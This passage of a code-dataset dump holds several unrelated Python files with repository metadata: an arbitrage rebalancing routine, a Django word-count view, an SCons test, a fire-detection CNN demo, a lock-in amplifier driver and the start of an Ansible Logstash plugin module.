] | 8
|
2018-05-30T19:45:08.000Z
|
2021-01-23T14:34:01.000Z
|
import datetime
import os
File = os.path.basename(__file__)
EPS = 1e-8
def make_orders(order_books, pair, current_balance, need_base, need_quote):
"""
makes orders to rebalance assets
:param order_books: see example at the beginning of this file
:param pair: pair or currencies to balance assets for
:param need_base: desired amount base currency
:param need_quote: desired amount of quote currency
:return: our_orders
"""
our_orders = dict()
# current_balance = copy.deepcopy(current_balance)
currencies = pair.split('_')
base_cur = currencies[0] # base currency of current pair (BTC for BTC/USD)
quote_cur = currencies[1] # quote currency of current pair (USD for BTC/USD)
# print(pair, base_cur, quote_cur)
ax = 0
bx = 0
asks = order_books[pair]['asks']
bids = order_books[pair]['bids']
ask_count = len(asks)
bid_count = len(bids)
base_amount = 0 # required amount of base currency
quote_amount = 0 # required amount of quote currency
sell_orders = {} # all sell_orders for current pair
buy_orders = {} # all buy_orders for current pair
if need_base != 0.0: # BUY
while ax < ask_count and need_base > EPS:
ask_price = asks[ax][0]
if ask_price < EPS:
ax += 1
continue
ask_vol = asks[ax][1]
if ask_vol < EPS:
ax += 1
continue
ask_price_real = asks[ax][2]
ask_exch = asks[ax][3] # BID: base -> quote
ask_bal = current_balance[ask_exch][quote_cur]
if ask_bal < EPS:
ax += 1
continue
try:
m = min(ask_vol, ask_bal / ask_price_real, need_base) # current micro-trade volume
if m < EPS:
ax += 1
continue
need_base -= m
asks[ax][1] -= m
current_balance[ask_exch][quote_cur] -= m * ask_price_real
except ZeroDivisionError as e:
Time = datetime.datetime.utcnow()
EventType = "ZeroDivisionError"
Function = "get_arb_opp"
Explanation = "ask_price_real is equal to 0"
EventText = e
ExceptionType = type(e)
print("{}|{}|{}|{}|{}|{}|{}".format(Time, EventType, Function, File, Explanation, EventText,
ExceptionType))
break
if ask_exch in buy_orders:
buy_orders[ask_exch][0] = max(buy_orders[ask_exch][0], ask_price_real)
buy_orders[ask_exch][1] += m
else:
buy_orders[ask_exch] = [ask_price_real, m]
else: #SELL
m = 0
while bx < bid_count and need_quote > 1e-4:
bid_price = bids[bx][0]
if bid_price < EPS:
bx += 1
continue
bid_vol = bids[bx][1]
if bid_vol < EPS:
bx += 1
continue
bid_price_real = bids[bx][2]
bid_exch = bids[bx][3] # ASK: quote -> base
bid_bal = current_balance[bid_exch][base_cur]
if bid_bal < EPS:
bx += 1
continue
m = min(bid_vol, bid_bal, need_quote / bid_price_real) # current micro-trade volume
if m < EPS:
bx += 1
continue
need_quote -= bid_price * m
bids[bx][1] -= m
current_balance[bid_exch][base_cur] -= m
if bid_exch in sell_orders:
sell_orders[bid_exch][0] = min(sell_orders[bid_exch][0], bid_price_real)
sell_orders[bid_exch][1] += m
else:
sell_orders[bid_exch] = [bid_price_real, m]
our_orders = {}
our_orders['buy'] = buy_orders
our_orders['sell'] = sell_orders
our_orders['required_base_amount'] = base_amount
our_orders['required_quote_amount'] = quote_amount
our_orders['profit'] = 0
return our_orders
def rebalance(data, order_books, total_balances, balances):
ok = False
orders = {}
cur_pair = ''
try:
for pair in data:
cnt = 0
rate = 0
for exch in data[pair]:
if len(data[pair][exch]['bids']) != 0 and len(data[pair][exch]['asks']) != 0:
rate += float(data[pair][exch]['bids'][0][2])
rate += float(data[pair][exch]['asks'][0][2])
cnt += 2
if cnt == 0:
continue
rate /= cnt
base, quote = pair.split('_')
if total_balances[base] == 0.0 and total_balances[quote] == 0.0:
continue
minvol, maxvol = min(total_balances[base] * rate, total_balances[quote]), max(total_balances[base] * rate, total_balances[quote])
if minvol / maxvol < 0.8:
ok = True
cur_pair = pair
if total_balances[base] * rate < total_balances[quote]:
orders = make_orders(order_books, pair, balances, need_base=(total_balances[quote] - total_balances[base] * rate) / 2 / rate, need_quote=0.0)
else:
orders = make_orders(order_books, pair, balances, need_base=0.0, need_quote=(total_balances[base] * rate - total_balances[quote]) / 2)
except Exception as e:
Time = datetime.datetime.utcnow()
EventType = "Error"
Function = "rebalance"
Explanation = "Fail while getting rates for currencies"
EventText = e
ExceptionType = type(e)
print("{}|{}|{}|{}|{}|{}|{}".format(Time, EventType, Function, File, Explanation, EventText,
ExceptionType))
return ok, cur_pair, orders
| 34.760234
| 161
| 0.533311
|
5bda013b86910213b9a272609eb95118774b6d52
| 537
|
py
|
Python
|
wordcount/wcount/views.py
|
chandansau/wordcount-
|
38df4d189ca2a745dde7977fc18518b371935f03
|
[
"MIT"
] | null | null | null |
wordcount/wcount/views.py
|
chandansau/wordcount-
|
38df4d189ca2a745dde7977fc18518b371935f03
|
[
"MIT"
] | null | null | null |
wordcount/wcount/views.py
|
chandansau/wordcount-
|
38df4d189ca2a745dde7977fc18518b371935f03
|
[
"MIT"
] | null | null | null |
from django.shortcuts import render
from django.http import HttpResponse
def home(request):
return render(request,"home.html")
def count(request):
fulltext=request.GET['fulltext']
wordlist=fulltext.split()
worddictionary= {}
for word in wordlist:
if word in worddictionary:
worddictionary[word] += 1
else:
worddictionary[word] = 1
return render(request,"count.html",{'fulltext':fulltext,'count':len(wordlist),'worddictionary':worddictionary.items()})
| 28.263158
| 124
| 0.659218
|
7c8973b7f4c3f097a06e5e03fdc0dcd276824755
| 5,085
|
py
|
Python
|
test/Variables/ListVariable.py
|
EmanueleCannizzaro/scons
|
6baa4e65cdf4df6951473545b69435711864e509
|
[
"MIT"
] | 1
|
2019-09-18T06:37:02.000Z
|
2019-09-18T06:37:02.000Z
|
test/Variables/ListVariable.py
|
EmanueleCannizzaro/scons
|
6baa4e65cdf4df6951473545b69435711864e509
|
[
"MIT"
] | null | null | null |
test/Variables/ListVariable.py
|
EmanueleCannizzaro/scons
|
6baa4e65cdf4df6951473545b69435711864e509
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
#
# Copyright (c) 2001 - 2016 The SCons Foundation
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
__revision__ = "test/Variables/ListVariable.py rel_2.5.1:3735:9dc6cee5c168 2016/11/03 14:02:02 bdbaddog"
"""
Test the ListVariable canned Variable type.
"""
import os
import TestSCons
test = TestSCons.TestSCons()
SConstruct_path = test.workpath('SConstruct')
def check(expect):
result = test.stdout().split('\n')
r = result[1:len(expect)+1]
assert r == expect, (r, expect)
test.write(SConstruct_path, """\
from SCons.Variables.ListVariable import ListVariable
LV = ListVariable
from SCons.Variables import ListVariable
list_of_libs = Split('x11 gl qt ical')
optsfile = 'scons.variables'
opts = Variables(optsfile, args=ARGUMENTS)
opts.AddVariables(
ListVariable('shared',
'libraries to build as shared libraries',
'all',
names = list_of_libs,
map = {'GL':'gl', 'QT':'qt'}),
LV('listvariable', 'listvariable help', 'all', names=['l1', 'l2', 'l3'])
)
env = Environment(variables=opts)
opts.Save(optsfile, env)
Help(opts.GenerateHelpText(env))
print env['shared']
if 'ical' in env['shared']: print '1'
else: print '0'
for x in env['shared']:
print x,
print
print env.subst('$shared')
# Test subst_path() because it's used in $CPPDEFINES expansions.
print env.subst_path('$shared')
Default(env.Alias('dummy', None))
""")
test.run()
check(['all', '1', 'gl ical qt x11', 'gl ical qt x11',
"['gl ical qt x11']"])
expect = "shared = 'all'"+os.linesep+"listvariable = 'all'"+os.linesep
test.must_match(test.workpath('scons.variables'), expect)
check(['all', '1', 'gl ical qt x11', 'gl ical qt x11',
"['gl ical qt x11']"])
test.run(arguments='shared=none')
check(['none', '0', '', '', "['']"])
test.run(arguments='shared=')
check(['none', '0', '', '', "['']"])
test.run(arguments='shared=x11,ical')
check(['ical,x11', '1', 'ical x11', 'ical x11',
"['ical x11']"])
test.run(arguments='shared=x11,,ical,,')
check(['ical,x11', '1', 'ical x11', 'ical x11',
"['ical x11']"])
test.run(arguments='shared=GL')
check(['gl', '0', 'gl', 'gl'])
test.run(arguments='shared=QT,GL')
check(['gl,qt', '0', 'gl qt', 'gl qt', "['gl qt']"])
expect_stderr = """
scons: *** Error converting option: shared
Invalid value(s) for option: foo
""" + test.python_file_line(SConstruct_path, 19)
test.run(arguments='shared=foo', stderr=expect_stderr, status=2)
# be paranoid in testing some more combinations
expect_stderr = """
scons: *** Error converting option: shared
Invalid value(s) for option: foo
""" + test.python_file_line(SConstruct_path, 19)
test.run(arguments='shared=foo,ical', stderr=expect_stderr, status=2)
expect_stderr = """
scons: *** Error converting option: shared
Invalid value(s) for option: foo
""" + test.python_file_line(SConstruct_path, 19)
test.run(arguments='shared=ical,foo', stderr=expect_stderr, status=2)
expect_stderr = """
scons: *** Error converting option: shared
Invalid value(s) for option: foo
""" + test.python_file_line(SConstruct_path, 19)
test.run(arguments='shared=ical,foo,x11', stderr=expect_stderr, status=2)
expect_stderr = """
scons: *** Error converting option: shared
Invalid value(s) for option: foo,bar
""" + test.python_file_line(SConstruct_path, 19)
test.run(arguments='shared=foo,x11,,,bar', stderr=expect_stderr, status=2)
test.write('SConstruct', """
from SCons.Variables import ListVariable
opts = Variables(args=ARGUMENTS)
opts.AddVariables(
ListVariable('gpib',
'comment',
['ENET', 'GPIB'],
names = ['ENET', 'GPIB', 'LINUX_GPIB', 'NO_GPIB']),
)
env = Environment(variables=opts)
Help(opts.GenerateHelpText(env))
print env['gpib']
Default(env.Alias('dummy', None))
""")
test.run(stdout=test.wrap_stdout(read_str="ENET,GPIB\n", build_str="""\
scons: Nothing to be done for `dummy'.
"""))
test.pass_test()
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
| 27.93956
| 104
| 0.688496
|
c0a4e1100a7e501be3cf79926dd8ec1c9b4b321d
| 851
|
py
|
Python
|
Tools/Scenarios/merge.py
|
ErQing/Nova
|
f33ffa519a0a3115e77a1a2317001858ccde8956
|
[
"MIT"
] | 212
|
2020-11-04T19:31:15.000Z
|
2022-03-30T14:44:32.000Z
|
Tools/Scenarios/merge.py
|
ErQing/Nova
|
f33ffa519a0a3115e77a1a2317001858ccde8956
|
[
"MIT"
] | 6
|
2021-05-26T01:02:26.000Z
|
2022-01-28T11:04:53.000Z
|
Tools/Scenarios/merge.py
|
ErQing/Nova
|
f33ffa519a0a3115e77a1a2317001858ccde8956
|
[
"MIT"
] | 28
|
2020-11-05T03:05:01.000Z
|
2022-03-03T03:30:30.000Z
|
#!/usr/bin/env python3
import os
in_dir = '../../Assets/Resources/Scenarios/'
template_filename = 'template.txt'
out_filename = 'scenario.txt'
with open(template_filename, 'r', encoding='utf-8') as f_template:
with open(out_filename, 'w', encoding='utf-8', newline='\n') as f_out:
for line in f_template:
if line.startswith('@include'):
include_filename = os.path.join(in_dir,
line.strip().split()[1])
if not os.path.exists(include_filename):
print('File not found:', include_filename)
continue
with open(include_filename, 'r',
encoding='utf-8') as f_include:
f_out.write(f_include.read())
else:
f_out.write(line)
| 37
| 74
| 0.534665
|
9d540fcf3ffd47391a70cffc9d5875aeef46f4ba
| 9,631
|
py
|
Python
|
inceptionV1-OnFire.py
|
xiaoluo999/fire-detection-cnn
|
e0d45f78af970be1cb8f935b10f87d2590e01913
|
[
"MIT"
] | null | null | null |
inceptionV1-OnFire.py
|
xiaoluo999/fire-detection-cnn
|
e0d45f78af970be1cb8f935b10f87d2590e01913
|
[
"MIT"
] | null | null | null |
inceptionV1-OnFire.py
|
xiaoluo999/fire-detection-cnn
|
e0d45f78af970be1cb8f935b10f87d2590e01913
|
[
"MIT"
] | null | null | null |
################################################################################
# Example : perform live fire detection in video using InceptionV1-OnFire CNN
# Copyright (c) 2017/18 - Andrew Dunnings / Toby Breckon, Durham University, UK
# License : https://github.com/tobybreckon/fire-detection-cnn/blob/master/LICENSE
################################################################################
import cv2
import os
import sys
import math
import glob
import numpy as np
################################################################################
import tflearn
from tflearn.layers.core import input_data, dropout, fully_connected
from tflearn.layers.conv import conv_2d, max_pool_2d, avg_pool_2d
from tflearn.layers.normalization import local_response_normalization
from tflearn.layers.merge_ops import merge
from tflearn.layers.estimator import regression
################################################################################
def construct_inceptionv1onfire (x,y):
# Build network as per architecture in [Dunnings/Breckon, 2018]
network = input_data(shape=[None, y, x, 3])
conv1_7_7 = conv_2d(network, 64, 5, strides=2, activation='relu', name = 'conv1_7_7_s2')
pool1_3_3 = max_pool_2d(conv1_7_7, 3,strides=2)
pool1_3_3 = local_response_normalization(pool1_3_3)
conv2_3_3_reduce = conv_2d(pool1_3_3, 64,1, activation='relu',name = 'conv2_3_3_reduce')
conv2_3_3 = conv_2d(conv2_3_3_reduce, 128,3, activation='relu', name='conv2_3_3')
conv2_3_3 = local_response_normalization(conv2_3_3)
pool2_3_3 = max_pool_2d(conv2_3_3, kernel_size=3, strides=2, name='pool2_3_3_s2')
inception_3a_1_1 = conv_2d(pool2_3_3, 64, 1, activation='relu', name='inception_3a_1_1')
inception_3a_3_3_reduce = conv_2d(pool2_3_3, 96,1, activation='relu', name='inception_3a_3_3_reduce')
inception_3a_3_3 = conv_2d(inception_3a_3_3_reduce, 128,filter_size=3, activation='relu', name = 'inception_3a_3_3')
inception_3a_5_5_reduce = conv_2d(pool2_3_3,16, filter_size=1,activation='relu', name ='inception_3a_5_5_reduce' )
inception_3a_5_5 = conv_2d(inception_3a_5_5_reduce, 32, filter_size=5, activation='relu', name= 'inception_3a_5_5')
inception_3a_pool = max_pool_2d(pool2_3_3, kernel_size=3, strides=1, )
inception_3a_pool_1_1 = conv_2d(inception_3a_pool, 32, filter_size=1, activation='relu', name='inception_3a_pool_1_1')
# merge the inception_3a__
inception_3a_output = merge([inception_3a_1_1, inception_3a_3_3, inception_3a_5_5, inception_3a_pool_1_1], mode='concat', axis=3)
inception_3b_1_1 = conv_2d(inception_3a_output, 128,filter_size=1,activation='relu', name= 'inception_3b_1_1' )
inception_3b_3_3_reduce = conv_2d(inception_3a_output, 128, filter_size=1, activation='relu', name='inception_3b_3_3_reduce')
inception_3b_3_3 = conv_2d(inception_3b_3_3_reduce, 192, filter_size=3, activation='relu',name='inception_3b_3_3')
inception_3b_5_5_reduce = conv_2d(inception_3a_output, 32, filter_size=1, activation='relu', name = 'inception_3b_5_5_reduce')
inception_3b_5_5 = conv_2d(inception_3b_5_5_reduce, 96, filter_size=5, name = 'inception_3b_5_5')
inception_3b_pool = max_pool_2d(inception_3a_output, kernel_size=3, strides=1, name='inception_3b_pool')
inception_3b_pool_1_1 = conv_2d(inception_3b_pool, 64, filter_size=1,activation='relu', name='inception_3b_pool_1_1')
#merge the inception_3b_*
inception_3b_output = merge([inception_3b_1_1, inception_3b_3_3, inception_3b_5_5, inception_3b_pool_1_1], mode='concat',axis=3,name='inception_3b_output')
pool3_3_3 = max_pool_2d(inception_3b_output, kernel_size=3, strides=2, name='pool3_3_3')
inception_4a_1_1 = conv_2d(pool3_3_3, 192, filter_size=1, activation='relu', name='inception_4a_1_1')
inception_4a_3_3_reduce = conv_2d(pool3_3_3, 96, filter_size=1, activation='relu', name='inception_4a_3_3_reduce')
inception_4a_3_3 = conv_2d(inception_4a_3_3_reduce, 208, filter_size=3, activation='relu', name='inception_4a_3_3')
inception_4a_5_5_reduce = conv_2d(pool3_3_3, 16, filter_size=1, activation='relu', name='inception_4a_5_5_reduce')
inception_4a_5_5 = conv_2d(inception_4a_5_5_reduce, 48, filter_size=5, activation='relu', name='inception_4a_5_5')
inception_4a_pool = max_pool_2d(pool3_3_3, kernel_size=3, strides=1, name='inception_4a_pool')
inception_4a_pool_1_1 = conv_2d(inception_4a_pool, 64, filter_size=1, activation='relu', name='inception_4a_pool_1_1')
inception_4a_output = merge([inception_4a_1_1, inception_4a_3_3, inception_4a_5_5, inception_4a_pool_1_1], mode='concat', axis=3, name='inception_4a_output')
pool5_7_7 = avg_pool_2d(inception_4a_output, kernel_size=5, strides=1)
pool5_7_7 = dropout(pool5_7_7, 0.4)
loss = fully_connected(pool5_7_7, 2,activation='softmax')
network = regression(loss, optimizer='momentum',
loss='categorical_crossentropy',
learning_rate=0.001)
model = tflearn.DNN(network, checkpoint_path='inceptiononv1onfire',
max_checkpoints=1, tensorboard_verbose=2)
return model
def cv_imread(file_path):
cv_img=cv2.imdecode(np.fromfile(file_path,dtype=np.uint8),-1)
return cv_img
################################################################################
# construct and display model
model = construct_inceptionv1onfire (224, 224)
print("Constructed InceptionV1-OnFire ...")
model.load(os.path.join("models/InceptionV1-OnFire", "inceptiononv1onfire"),weights_only=True)
print("Loaded CNN network weights ...")
################################################################################
# network input sizes
rows = 224
cols = 224
# display and loop settings
windowName = "Live Fire Detection - InceptionV1-OnFire";
keepProcessing = True;
################################################################################
if False:
# load video file from first command line argument
video = cv2.VideoCapture("./models/test.mp4")
print("Loaded video ...")
# create window
cv2.namedWindow(windowName, cv2.WINDOW_NORMAL);
# get video properties
width = int(video.get(cv2.CAP_PROP_FRAME_WIDTH));
height = int(video.get(cv2.CAP_PROP_FRAME_HEIGHT))
fps = video.get(cv2.CAP_PROP_FPS)
frame_time = round(1000/fps);
while (keepProcessing):
# start a timer (to see how long processing and display takes)
start_t = cv2.getTickCount();
# get video frame from file, handle end of file
ret, frame = video.read()
if not ret:
print("... end of video file reached");
break;
# re-size image to network input size and perform prediction
small_frame = cv2.resize(frame, (rows, cols), cv2.INTER_AREA)
output = model.predict([small_frame])
# label image based on prediction
if round(output[0][0]) == 1:
cv2.rectangle(frame, (0,0), (width,height), (0,0,255), 50)
cv2.putText(frame,'FIRE',(int(width/16),int(height/4)),
cv2.FONT_HERSHEY_SIMPLEX, 4,(255,255,255),10,cv2.LINE_AA);
else:
cv2.rectangle(frame, (0,0), (width,height), (0,255,0), 50)
cv2.putText(frame,'CLEAR',(int(width/16),int(height/4)),
cv2.FONT_HERSHEY_SIMPLEX, 4,(255,255,255),10,cv2.LINE_AA);
# stop the timer and convert to ms. (to see how long processing and display takes)
stop_t = ((cv2.getTickCount() - start_t)/cv2.getTickFrequency()) * 1000;
# image display and key handling
cv2.imshow(windowName, frame);
# wait fps time or less depending on processing time taken (e.g. 1000ms / 25 fps = 40 ms)
key = cv2.waitKey(max(2, frame_time - int(math.ceil(stop_t)))) & 0xFF;
if (key == ord('x')):
keepProcessing = False;
elif (key == ord('f')):
cv2.setWindowProperty(windowName, cv2.WND_PROP_FULLSCREEN, cv2.WINDOW_FULLSCREEN);
else:
path_list = glob.glob(os.path.join(r"F:\data\fire\工厂实景图片\工厂实景图片\华达油墨图片","*.jpg"))
for path in path_list:
print("Loaded images ...")
# create window
cv2.namedWindow(windowName, cv2.WINDOW_NORMAL);
# get video properties
img = cv_imread(path)
width = img.shape[1]
height = img.shape[0]
# start a timer (to see how long processing and display takes)
start_t = cv2.getTickCount();
# re-size image to network input size and perform prediction
small_frame = cv2.resize(img, (rows, cols), cv2.INTER_AREA)
output = model.predict([small_frame])
# label image based on prediction
if round(output[0][0]) == 1:
cv2.rectangle(img, (0, 0), (width, height), (0, 0, 255), 50)
cv2.putText(img, 'FIRE', (int(width / 16), int(height / 4)),
cv2.FONT_HERSHEY_SIMPLEX, 4, (255, 255, 255), 10, cv2.LINE_AA);
else:
cv2.rectangle(img, (0, 0), (width, height), (0, 255, 0), 50)
cv2.putText(img, 'CLEAR', (int(width / 16), int(height / 4)),
cv2.FONT_HERSHEY_SIMPLEX, 4, (255, 255, 255), 10, cv2.LINE_AA);
# stop the timer and convert to ms. (to see how long processing and display takes)
stop_t = ((cv2.getTickCount() - start_t) / cv2.getTickFrequency()) * 1000;
print("%d ms"%stop_t)
# image display and key handling
cv2.imshow(windowName, img);
cv2.waitKey(0)
################################################################################
| 43.977169
| 161
| 0.649569
|
6f7c6dd24f07d836bfcc4727c3766c7afe0bfdcb
| 286
|
py
|
Python
|
python/ordering_common/ordering_psi4.py
|
colleeneb/simint-generator
|
48125f29612c4a78a2d1493f717d82e4af095c59
|
[
"BSD-3-Clause"
] | 20
|
2017-07-04T16:10:22.000Z
|
2021-04-19T20:48:44.000Z
|
python/ordering_common/ordering_psi4.py
|
colleeneb/simint-generator
|
48125f29612c4a78a2d1493f717d82e4af095c59
|
[
"BSD-3-Clause"
] | 9
|
2017-03-22T07:57:38.000Z
|
2018-12-11T18:48:55.000Z
|
python/ordering_common/ordering_psi4.py
|
colleeneb/simint-generator
|
48125f29612c4a78a2d1493f717d82e4af095c59
|
[
"BSD-3-Clause"
] | 8
|
2017-10-23T23:16:28.000Z
|
2021-12-13T17:18:11.000Z
|
from .gaussian import Gaussian
def IteratePsi4(g):
newg = Gaussian(g.am)
if g.ijk[2] == g.am:
newg.ijk = [-1, -1, -1]
elif g.ijk[2] < (g.am - g.ijk[0]):
newg.ijk = [g.ijk[0], g.ijk[1]-1, g.ijk[2]+1]
else:
newg.ijk = [g.ijk[0]-1, g.am-g.ijk[0]+1, 0]
return newg
| 20.428571
| 49
| 0.538462
|
9e0f1f920377e87997892102de21c8ba512bfb3f
| 5,427
|
py
|
Python
|
drivers/lockInAmp/sr830.py
|
mv20100/phd_code
|
2262c71c7c35aed5759c4b0e058fe74c44e5266b
|
[
"MIT"
] | null | null | null |
drivers/lockInAmp/sr830.py
|
mv20100/phd_code
|
2262c71c7c35aed5759c4b0e058fe74c44e5266b
|
[
"MIT"
] | null | null | null |
drivers/lockInAmp/sr830.py
|
mv20100/phd_code
|
2262c71c7c35aed5759c4b0e058fe74c44e5266b
|
[
"MIT"
] | null | null | null |
import visa
import time
import numpy as np
sensitivities = [2e-9,5e-9,1e-8,2e-8,5e-8,1e-7,2e-7,5e-7,1e-6,2e-6,5e-6,
1e-5,2e-5,5e-5,1e-4,2e-4,5e-4,1e-3,2e-3,5e-3,1e-2,2e-2,5e-2,
1e-1,2e-1,5e-1,1] # in volt
timeConstants = [1e-5,3e-5,1e-4,3e-4,1e-3,3e-3,1e-2,3e-2,0.1,0.3,1,3,10,30,1e2,3e2,1e3,3e3,1e4,3e4] # in second
sampleRates = [62.5e-3,125e-3,250e-3,500e-3,1,2,4,8,16,32,64,128,256,512,"Trigger"]
lowPassFiltSlopes = [6,12,18,24] # in dB/oct
inputConfigs = ["A","A-B","I (1 Mohm)","I (100 Mohm)"]
inputShieldGrounds = ["Float","Ground"]
inputCouplings = ["AC","DC"]
lineNotchFilters = ["Out","Line In","2xLine In","Both In"]
locRemStates = ["LOCAL","REMOTE","LOCAL LOCKOUT"]
class SR830(object):
def __init__(self,gpibAdress=8,name=None):
gpibID = "GPIB::"+str(gpibAdress)+"::INSTR"
rm = visa.ResourceManager()
self.inst = rm.open_resource(gpibID,read_termination='\n')
self.name = name
self.overide_rem_state = 0
self.loc_rem_state = 1
def send(self,command):
self.inst.write(command)
def query(self,command):
self.send(command)
return self.inst.read()
#REFERENCE
@property
def amplitude(self):
return float(self.query("SLVL?"))
@amplitude.setter
def amplitude(self,amplitude):
self.send("SLVL "+str(amplitude))
@property
def phase(self):
return float(self.query("PHAS?"))
@phase.setter
def phase(self,phase):
self.send("PHAS "+str(phase))
@property
def ref_freq(self):
return float(self.query("FREQ?"))
@ref_freq.setter
def ref_freq(self,freq):
self.send("FREQ "+str(freq))
def getOutputX(self,iterations=1,timeit=False):
value = 0.
startT = time.time()
for i in range(iterations):
self.inst.write("OUTP?1")
value = value + float(self.inst.read())
if timeit: print "Duration: "+str(time.time()-startT)
value = value/iterations
return value
def getOutputX2(self,sampleRateIdx=8,timeit=False,samples=25):
startT = time.time()
self.inst.write("SRAT "+str(int(sampleRateIdx))+";SEND 0")
self.inst.write("REST;STRT")
while self.getSamplePoints()<samples:
time.sleep(0.01)
self.inst.write("PAUS")
self.inst.write("TRCA?1,0,"+str(int(samples)))
buffer = self.inst.read()
if timeit: print "Duration: "+str(time.time()-startT)
return np.mean(np.array(buffer.split(',')[:-1],dtype=np.float))
#INPUT and FILTER
@property
def input_config(self):
inputConfigIdx = int(self.query("ISRC?"))
return inputConfigs[inputConfigIdx]
@input_config.setter
def input_config(self,inputConfig):
self.send("ISRC "+str(inputConfig))
@property
def input_shield_ground(self):
inputShieldGroundIdx = int(self.query("IGND?"))
return inputShieldGrounds[inputShieldGroundIdx]
@input_shield_ground.setter
def input_shield_ground(self,inputShieldGround):
self.send("IGND "+str(inputShieldGround))
@property
def input_coupling(self):
inputCouplingIdx = int(self.query("ICPL?"))
return inputCouplings[inputCouplingIdx]
@input_coupling.setter
def input_coupling(self,inputCoupling):
self.send("ICPL "+str(inputCoupling))
@property
def line_notch_filter(self):
lineNotchFilterIdx = int(self.query("ILIN?"))
return lineNotchFilters[lineNotchFilterIdx]
@line_notch_filter.setter
def line_notch_filter(self,lineNotchFilter):
self.send("ILIN "+str(lineNotchFilter))
#GAIN and TIME CONSTANT
@property
def sensitivity(self):
sensitivityIdx = int(self.query("SENS?"))
return sensitivities[sensitivityIdx]
@sensitivity.setter
def sensitivity(self,sensitivity):
self.send("SENS "+str(sensitivity))
@property
def time_constant(self):
timeConstantIdx = int(self.query("OFLT?"))
return timeConstants[timeConstantIdx]
@time_constant.setter
def time_constant(self,timeConstant):
self.send("OFLT "+str(timeConstant))
@property
def lowpass_filter_slope(self):
lowPassFiltSlopeIdx = int(self.query("OFSL?"))
return lowPassFiltSlopes[lowPassFiltSlopeIdx]
@lowpass_filter_slope.setter
def lowpass_filter_slope(self,lowPassFiltSlope):
self.send("OFSL "+str(lowPassFiltSlope))
# DATA TRANSFER COMMANDS
@property
def sample_points(self):
return int(self.query("SPTS?"))
# INTERFACE
@property
def loc_rem_state(self):
locRemStateIdx = int(self.query("LOCL?"))
return locRemStates[locRemStateIdx]
@loc_rem_state.setter
def loc_rem_state(self,locRemState):
self.send("LOCL "+str(locRemState))
@property
def overide_rem_state(self):
return int(self.query("OVRM?"))
@overide_rem_state.setter
def overide_rem_state(self,overideRemState):
self.send("OVRM "+str(int(overideRemState)))
def getParams(self):
params = dict()
params.update({"lowPassFiltSlope":self.getLowPassFiltSlope()})
params.update({"timeConstant":self.getTimeConstant()})
params.update({"sensitivity":self.getSensitivity()})
params.update({"lineNotchFilter":self.getLineNotchFilter()})
params.update({"inputCoupling":self.getInputCoupling()})
params.update({"inputShieldGround":self.getInputShieldGround()})
params.update({"inputConfig":self.getInputConfig()})
params.update({"refFreq":self.getRefFreq()})
params.update({"amplitude":self.getAmplitude()})
params.update({"phase":self.getPhase()})
return {self.name:params}
if __name__=='__main__':
lockIn = SR830()
| 29.335135
| 112
| 0.696149
|
748c875f667303df7dc99fcda1857333081b1eb1
| 5,251
|
py
|
Python
|
ansible/modules/monitoring/logstash_plugin.py
|
EnjoyLifeFund/py36pkgs
|
0ac677fbbfa7b6d8c527fe2c759ba05117b07fd2
|
[
"MIT",
"BSD-2-Clause",
"BSD-3-Clause"
] | null | null | null |
ansible/modules/monitoring/logstash_plugin.py
|
EnjoyLifeFund/py36pkgs
|
0ac677fbbfa7b6d8c527fe2c759ba05117b07fd2
|
[
"MIT",
"BSD-2-Clause",
"BSD-3-Clause"
] | null | null | null |
ansible/modules/monitoring/logstash_plugin.py
|
EnjoyLifeFund/py36pkgs
|
0ac677fbbfa7b6d8c527fe2c759ba05117b07fd2
|
[
"MIT",
"BSD-2-Clause",
"BSD-3-Clause"
] | 1
|
2020-02-13T14:24:57.000Z
|
2020-02-13T14:24:57.000Z
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
"""
Ansible module to manage elasticsearch plugins
(c) 2017, Loic Blot <loic.blot@unix-experience.fr>
This file is part of Ansible
Ansible is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
Ansible is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with Ansible. If not, see <http://www.gnu.org/licenses/>.
"""
ANSIBLE_METADATA = {'metadata_version': '1.0',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: logstash_plugin
short_description: Manage Logstash plugins
description:
- Manages Logstash plugins.
version_added: "2.3"
author: Loic Blot (@nerzhul)
options:
name:
description:
- Install plugin with that name.
required: True
state:
description:
- Apply plugin state.
required: False
choices: ["present", "absent"]
default: present
plugin_bin:
description:
- Specify logstash-plugin to use for plugin management.
required: False
default: /usr/share/logstash/bin/logstash-plugin
proxy_host:
description:
- Proxy host to use during plugin installation.
required: False
default: None
proxy_port:
description:
- Proxy port to use during plugin installation.
required: False
default: None
version:
description:
- Specify plugin Version of the plugin to install.
If plugin exists with previous version, it will NOT be updated.
required: False
default: None
'''
EXAMPLES = '''
- name: Install Logstash beats input plugin
logstash_plugin:
state: present
name: logstash-input-beats
- name: Install specific version of a plugin
logstash_plugin:
state: present
name: logstash-input-syslog
version: '3.2.0'
- name: Uninstall Logstash plugin
logstash_plugin:
state: absent
name: logstash-filter-multiline
'''
PACKAGE_STATE_MAP = dict(
present="install",
absent="remove"
)
from ansible.module_utils.basic import AnsibleModule
